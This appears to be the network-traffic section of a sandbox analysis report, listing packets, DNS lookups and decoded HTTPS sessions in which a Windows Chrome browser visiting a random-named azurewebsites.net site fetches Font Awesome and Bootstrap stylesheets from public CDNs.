                          May 25, 2024 01:01:30.540265083 CEST49786443192.168.2.6172.217.18.4
                          May 25, 2024 01:01:30.540445089 CEST44349786172.217.18.4192.168.2.6
                          May 25, 2024 01:01:30.583378077 CEST49786443192.168.2.6172.217.18.4
                          May 25, 2024 01:01:40.382752895 CEST44349786172.217.18.4192.168.2.6
                          May 25, 2024 01:01:40.382852077 CEST44349786172.217.18.4192.168.2.6
                          May 25, 2024 01:01:40.382920027 CEST49786443192.168.2.6172.217.18.4
                          May 25, 2024 01:01:41.676078081 CEST49786443192.168.2.6172.217.18.4
                          May 25, 2024 01:01:41.676120996 CEST44349786172.217.18.4192.168.2.6

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          May 25, 2024 01:00:27.541501999 CEST53587781.1.1.1192.168.2.6
                          May 25, 2024 01:00:27.560856104 CEST53634371.1.1.1192.168.2.6
                          May 25, 2024 01:00:28.774089098 CEST53646411.1.1.1192.168.2.6
                          May 25, 2024 01:00:28.930212021 CEST6539353192.168.2.61.1.1.1
                          May 25, 2024 01:00:28.930389881 CEST5590053192.168.2.61.1.1.1
                          May 25, 2024 01:00:28.980493069 CEST53559001.1.1.1192.168.2.6
                          May 25, 2024 01:00:29.736154079 CEST5754753192.168.2.61.1.1.1
                          May 25, 2024 01:00:29.736362934 CEST6201853192.168.2.61.1.1.1
                          May 25, 2024 01:00:29.754120111 CEST53620181.1.1.1192.168.2.6
                          May 25, 2024 01:00:29.754137993 CEST53575471.1.1.1192.168.2.6
                          May 25, 2024 01:00:30.413352966 CEST5222353192.168.2.61.1.1.1
                          May 25, 2024 01:00:30.414407969 CEST5948353192.168.2.61.1.1.1
                          May 25, 2024 01:00:30.415792942 CEST6325953192.168.2.61.1.1.1
                          May 25, 2024 01:00:30.416480064 CEST6479853192.168.2.61.1.1.1
                          May 25, 2024 01:00:30.440136909 CEST6317953192.168.2.61.1.1.1
                          May 25, 2024 01:00:30.440768957 CEST6454053192.168.2.61.1.1.1
                          May 25, 2024 01:00:30.444153070 CEST53645091.1.1.1192.168.2.6
                          May 25, 2024 01:00:30.444188118 CEST53522231.1.1.1192.168.2.6
                          May 25, 2024 01:00:30.444216013 CEST53594831.1.1.1192.168.2.6
                          May 25, 2024 01:00:30.444243908 CEST53647981.1.1.1192.168.2.6
                          May 25, 2024 01:00:30.444271088 CEST53632591.1.1.1192.168.2.6
                          May 25, 2024 01:00:30.468339920 CEST53631791.1.1.1192.168.2.6
                          May 25, 2024 01:00:30.468631029 CEST53645401.1.1.1192.168.2.6
                          May 25, 2024 01:00:32.238936901 CEST53546841.1.1.1192.168.2.6
                          May 25, 2024 01:00:32.395021915 CEST53493311.1.1.1192.168.2.6
                          May 25, 2024 01:00:32.766856909 CEST6214753192.168.2.61.1.1.1
                          May 25, 2024 01:00:32.766856909 CEST4955453192.168.2.61.1.1.1
                          May 25, 2024 01:00:32.778538942 CEST53495541.1.1.1192.168.2.6
                          May 25, 2024 01:00:33.599399090 CEST53502991.1.1.1192.168.2.6
                          May 25, 2024 01:00:45.862317085 CEST53522441.1.1.1192.168.2.6
                          May 25, 2024 01:01:05.225445986 CEST53582631.1.1.1192.168.2.6
                          May 25, 2024 01:01:27.406651974 CEST53543551.1.1.1192.168.2.6
                          May 25, 2024 01:01:28.092303991 CEST53504881.1.1.1192.168.2.6

                          ICMP Packets

                          TimestampSource IPDest IPChecksumCodeType
                          May 25, 2024 01:00:27.561053038 CEST192.168.2.61.1.1.1c235(Port unreachable)Destination Unreachable
                          May 25, 2024 01:00:32.395093918 CEST192.168.2.61.1.1.1c229(Port unreachable)Destination Unreachable

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          May 25, 2024 01:00:28.930212021 CEST192.168.2.61.1.1.10x6afStandard query (0)forwigjoeeiorjegoeirjhhjeri.azurewebsites.netA (IP address)IN (0x0001)false
                          May 25, 2024 01:00:28.930389881 CEST192.168.2.61.1.1.10xfdc3Standard query (0)forwigjoeeiorjegoeirjhhjeri.azurewebsites.net65IN (0x0001)false
                          May 25, 2024 01:00:29.736154079 CEST192.168.2.61.1.1.10x564cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                          May 25, 2024 01:00:29.736362934 CEST192.168.2.61.1.1.10xaaf0Standard query (0)www.google.com65IN (0x0001)false
                          May 25, 2024 01:00:30.413352966 CEST192.168.2.61.1.1.10x6185Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                          May 25, 2024 01:00:30.414407969 CEST192.168.2.61.1.1.10x56c8Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                          May 25, 2024 01:00:30.415792942 CEST192.168.2.61.1.1.10x20d2Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                          May 25, 2024 01:00:30.416480064 CEST192.168.2.61.1.1.10xb834Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                          May 25, 2024 01:00:30.440136909 CEST192.168.2.61.1.1.10x1841Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                          May 25, 2024 01:00:30.440768957 CEST192.168.2.61.1.1.10x3139Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                          May 25, 2024 01:00:32.766856909 CEST192.168.2.61.1.1.10x124cStandard query (0)forwigjoeeiorjegoeirjhhjeri.azurewebsites.netA (IP address)IN (0x0001)false
                          May 25, 2024 01:00:32.766856909 CEST192.168.2.61.1.1.10x1e97Standard query (0)forwigjoeeiorjegoeirjhhjeri.azurewebsites.net65IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          May 25, 2024 01:00:28.970774889 CEST1.1.1.1192.168.2.60x6afNo error (0)forwigjoeeiorjegoeirjhhjeri.azurewebsites.netwaws-prod-ln1-149.sip.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:00:28.970774889 CEST1.1.1.1192.168.2.60x6afNo error (0)waws-prod-ln1-149.sip.azurewebsites.windows.netwaws-prod-ln1-149-f7ac.uksouth.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:00:28.980493069 CEST1.1.1.1192.168.2.60xfdc3No error (0)forwigjoeeiorjegoeirjhhjeri.azurewebsites.netwaws-prod-ln1-149.sip.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:00:28.980493069 CEST1.1.1.1192.168.2.60xfdc3No error (0)waws-prod-ln1-149.sip.azurewebsites.windows.netwaws-prod-ln1-149-f7ac.uksouth.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:00:29.754120111 CEST1.1.1.1192.168.2.60xaaf0No error (0)www.google.com65IN (0x0001)false
                          May 25, 2024 01:00:29.754137993 CEST1.1.1.1192.168.2.60x564cNo error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                          May 25, 2024 01:00:30.444188118 CEST1.1.1.1192.168.2.60x6185No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                          May 25, 2024 01:00:30.444188118 CEST1.1.1.1192.168.2.60x6185No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                          May 25, 2024 01:00:30.444216013 CEST1.1.1.1192.168.2.60x56c8No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                          May 25, 2024 01:00:30.444243908 CEST1.1.1.1192.168.2.60xb834No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                          May 25, 2024 01:00:30.444271088 CEST1.1.1.1192.168.2.60x20d2No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                          May 25, 2024 01:00:30.444271088 CEST1.1.1.1192.168.2.60x20d2No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                          May 25, 2024 01:00:30.468339920 CEST1.1.1.1192.168.2.60x1841No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                          May 25, 2024 01:00:30.468339920 CEST1.1.1.1192.168.2.60x1841No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                          May 25, 2024 01:00:30.468631029 CEST1.1.1.1192.168.2.60x3139No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                          May 25, 2024 01:00:32.778538942 CEST1.1.1.1192.168.2.60x1e97No error (0)forwigjoeeiorjegoeirjhhjeri.azurewebsites.netwaws-prod-ln1-149.sip.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:00:32.778538942 CEST1.1.1.1192.168.2.60x1e97No error (0)waws-prod-ln1-149.sip.azurewebsites.windows.netwaws-prod-ln1-149-f7ac.uksouth.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:00:32.816660881 CEST1.1.1.1192.168.2.60x124cNo error (0)forwigjoeeiorjegoeirjhhjeri.azurewebsites.netwaws-prod-ln1-149.sip.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:00:32.816660881 CEST1.1.1.1192.168.2.60x124cNo error (0)waws-prod-ln1-149.sip.azurewebsites.windows.netwaws-prod-ln1-149-f7ac.uksouth.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:00:42.225528955 CEST1.1.1.1192.168.2.60xad79No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                          May 25, 2024 01:00:42.225528955 CEST1.1.1.1192.168.2.60xad79No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                          May 25, 2024 01:00:43.048887014 CEST1.1.1.1192.168.2.60x396fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:00:43.048887014 CEST1.1.1.1192.168.2.60x396fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                          May 25, 2024 01:00:58.730905056 CEST1.1.1.1192.168.2.60x4699No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:00:58.730905056 CEST1.1.1.1192.168.2.60x4699No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                          May 25, 2024 01:01:20.324816942 CEST1.1.1.1192.168.2.60x454aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:01:20.324816942 CEST1.1.1.1192.168.2.60x454aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                          May 25, 2024 01:01:41.652479887 CEST1.1.1.1192.168.2.60xfab6No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          May 25, 2024 01:01:41.652479887 CEST1.1.1.1192.168.2.60xfab6No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • https:
                            • maxcdn.bootstrapcdn.com
                            • stackpath.bootstrapcdn.com
                            • cdnjs.cloudflare.com
                          • fs.microsoft.com

                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.649713104.18.11.2074432064C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-24 23:00:31 UTC609OUTGET /font-awesome/4.5.0/css/font-awesome.min.css HTTP/1.1
                          Host: maxcdn.bootstrapcdn.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-24 23:00:31 UTC932INHTTP/1.1 200 OK
                          Date: Fri, 24 May 2024 23:00:31 GMT
                          Content-Type: text/css; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          CDN-PullZone: 252412
                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                          CDN-RequestCountryCode: US
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=31919000
                          ETag: W/"4fbd15cb6047af93373f4f895639c8bf"
                          Last-Modified: Mon, 25 Jan 2021 22:04:54 GMT
                          CDN-ProxyVer: 1.04
                          CDN-RequestPullSuccess: True
                          CDN-RequestPullCode: 200
                          CDN-CachedAt: 01/03/2024 15:02:49
                          CDN-EdgeStorageId: 894
                          timing-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          X-Content-Type-Options: nosniff
                          CDN-Status: 200
                          CDN-RequestId: 8c65d8174b33dc87f42e79c79c214935
                          CDN-Cache: HIT
                          CF-Cache-Status: HIT
                          Age: 6233965
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Server: cloudflare
                          CF-RAY: 8890e6ff5e370f8f-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-24 23:00:31 UTC437INData Raw: 36 62 34 61 0d 0a 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 35 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d 34 2e 35
                          Data Ascii: 6b4a/*! * Font Awesome 4.5.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.5
                          2024-05-24 23:00:31 UTC1369INData Raw: 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 3f 76 3d 34 2e 35 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 3f 76 3d 34 2e 35 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 3f 76 3d 34 2e 35 2e 30 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 66 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 3a
                          Data Ascii: e-webfont.woff?v=4.5.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.5.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.5.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:
                          2024-05-24 23:00:31 UTC1369INData Raw: 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 7d 7d 2e 66 61 2d 72 6f 74 61 74 65 2d 39 30 7b 66
                          Data Ascii: rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.fa-rotate-90{f
                          2024-05-24 23:00:31 UTC1369INData Raw: 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 61 2d 73 74 61 63 6b 2d 31 78 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 69 6e 76 65 72 73 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 66 61 2d 67 6c 61 73 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 30 22 7d 2e 66 61 2d 6d 75 73 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 31 22 7d 2e 66 61 2d 73 65 61 72 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 32 22 7d 2e 66 61 2d 65 6e 76 65 6c 6f 70 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 33 22 7d 2e 66 61 2d 68 65 61 72 74
                          Data Ascii: h:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f002"}.fa-envelope-o:before{content:"\f003"}.fa-heart
                          2024-05-24 23:00:31 UTC1369INData Raw: 22 7d 2e 66 61 2d 68 65 61 64 70 68 6f 6e 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 35 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 36 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 37 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 38 22 7d 2e 66 61 2d 71 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 39 22 7d 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 61 22 7d 2e 66 61 2d 74 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 62 22 7d 2e
                          Data Ascii: "}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:before{content:"\f02a"}.fa-tag:before{content:"\f02b"}.
                          2024-05-24 23:00:31 UTC1369INData Raw: 65 6e 74 3a 22 5c 66 30 34 39 22 7d 2e 66 61 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 61 22 7d 2e 66 61 2d 70 6c 61 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 62 22 7d 2e 66 61 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 63 22 7d 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 64 22 7d 2e 66 61 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 65 22 7d 2e 66 61 2d 66 61 73 74 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 30 22 7d 2e 66 61 2d 73 74 65 70 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66
                          Data Ascii: ent:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{content:"\f050"}.fa-step-forward:before{content:"\f
                          2024-05-24 23:00:31 UTC1369INData Raw: 62 65 66 6f 72 65 2c 2e 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 31 22 7d 2e 66 61 2d 70 6c 61 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 32 22 7d 2e 66 61 2d 63 61 6c 65 6e 64 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 33 22 7d 2e 66 61 2d 72 61 6e 64 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 34 22 7d 2e 66 61 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 35 22 7d 2e 66 61 2d 6d 61 67 6e 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 36 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e
                          Data Ascii: before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:before{content:"\f076"}.fa-chevron-up:before{conten
                          2024-05-24 23:00:31 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 36 22 7d 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 37 22 7d 2e 66 61 2d 70 68 6f 6e 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 38 22 7d 2e 66 61 2d 74 77 69 74 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 39 22 7d 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 2d 66 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 61 22 7d 2e 66 61 2d 67 69 74 68 75 62 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 62 22 7d 2e 66 61 2d 75 6e 6c 6f 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 63 22 7d
                          Data Ascii: content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{content:"\f09b"}.fa-unlock:before{content:"\f09c"}
                          2024-05-24 23:00:31 UTC1369INData Raw: 6e 74 3a 22 5c 66 30 63 37 22 7d 2e 66 61 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 38 22 7d 2e 66 61 2d 6e 61 76 69 63 6f 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 72 65 6f 72 64 65 72 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 39 22 7d 2e 66 61 2d 6c 69 73 74 2d 75 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 61 22 7d 2e 66 61 2d 6c 69 73 74 2d 6f 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 62 22 7d 2e 66 61 2d 73 74 72 69 6b 65 74 68 72 6f 75 67 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 63 22 7d 2e 66 61 2d 75 6e 64 65 72 6c 69 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a
                          Data Ascii: nt:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:before{content:"\f0cc"}.fa-underline:before{content:
                          2024-05-24 23:00:31 UTC1369INData Raw: 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 61 22 7d 2e 66 61 2d 6c 69 67 68 74 62 75 6c 62 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 62 22 7d 2e 66 61 2d 65 78 63 68 61 6e 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 63 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 64 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 65 22 7d 2e 66 61 2d 75 73 65 72 2d 6d 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 30 22 7d 2e 66 61 2d 73 74 65 74 68 6f 73 63 6f 70 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30
                          Data Ascii: oard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{content:"\f0f0"}.fa-stethoscope:before{content:"\f0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.649714104.18.10.2074432064C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-24 23:00:31 UTC666OUTGET /bootstrap/4.5.2/css/bootstrap.min.css HTTP/1.1
                          Host: stackpath.bootstrapcdn.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
